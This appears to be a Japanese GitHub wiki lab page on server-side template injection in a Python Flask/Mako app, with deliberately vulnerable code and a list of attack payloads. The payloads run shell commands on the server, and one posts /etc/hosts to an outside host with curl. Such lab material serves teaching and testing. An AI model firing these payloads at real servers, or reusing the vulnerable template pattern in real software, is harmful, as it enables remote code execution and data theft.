SSTI python 03 - yujitounai/helloworld GitHub Wiki

サーバーサイドテンプレートインジェクション

脆弱なソースコード (Python / Mako)

ユーザーが送信した name の値を、Mako に渡す前のテンプレート文字列そのものに % で埋め込んでいるため、入力に含まれる ${...} がサーバー側で式として評価される。

server.py

# for this we need to install flask
from flask import *
from mako.template import Template


# Flask application object; the @app.route decorator below registers its handler on it.
app = Flask(__name__)

@app.route('/',methods=['GET', 'POST'])
def base():
    """Serve the greeting form and, on POST, greet the submitted name.

    Intentionally vulnerable (server-side template injection): the
    submitted ``name`` is spliced into the template *source* with ``%``
    before Mako compiles it, so a ``${...}`` expression in the input is
    evaluated on the server when the template is rendered.

    Safe pattern: keep the template text constant and hand the value to
    Mako as render context instead, e.g. ``Hello ${person | h}!`` with
    ``render(person=person)``; the ``h`` filter HTML-escapes the output.
    """
    person = ""
    if request.method == 'POST':
      # An empty value leaves the default "" in place.
      # NOTE(review): a POST with no 'name' field presumably ends in
      # Flask's 400 response for a missing form key; confirm.
      if request.form['name']:
        # Untrusted input taken as-is: no validation, no escaping.
        person = request.form['name']

    # Injection point: `person` becomes part of the template source here,
    # before compilation, instead of being passed as a render() variable.
    template = '<!DOCTYPE html><html><body>\
    <form action="/" method="post">\
      First name:<br>\
      <input type="text" name="name" value="">\
      <input type="submit" value="Submit">\
    </form><h2>Hello %s! </h2></body></html>' % person
    # `data` is supplied as context, but the template above never references it.
    return Template(template).render(data="world")


if __name__ == "__main__":
    # Listens on every interface (0.0.0.0), port 5072, debugger off.
    # The handler above is deliberately exploitable, so run this only in
    # an isolated lab container or network, never on a reachable host.
    app.run(host="0.0.0.0", port=5072, debug=False)

Dockerfile


攻撃する方法

${__import__("subprocess").check_output("ls")}

${self.module.cache.util.os.system("sleep 5")}

${self.module.runtime.util.os.system("id")}

${self.module.runtime.util.os.system("curl -XPOST http://bogus.jp/postaccess.php -d @/etc/hosts")}

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md
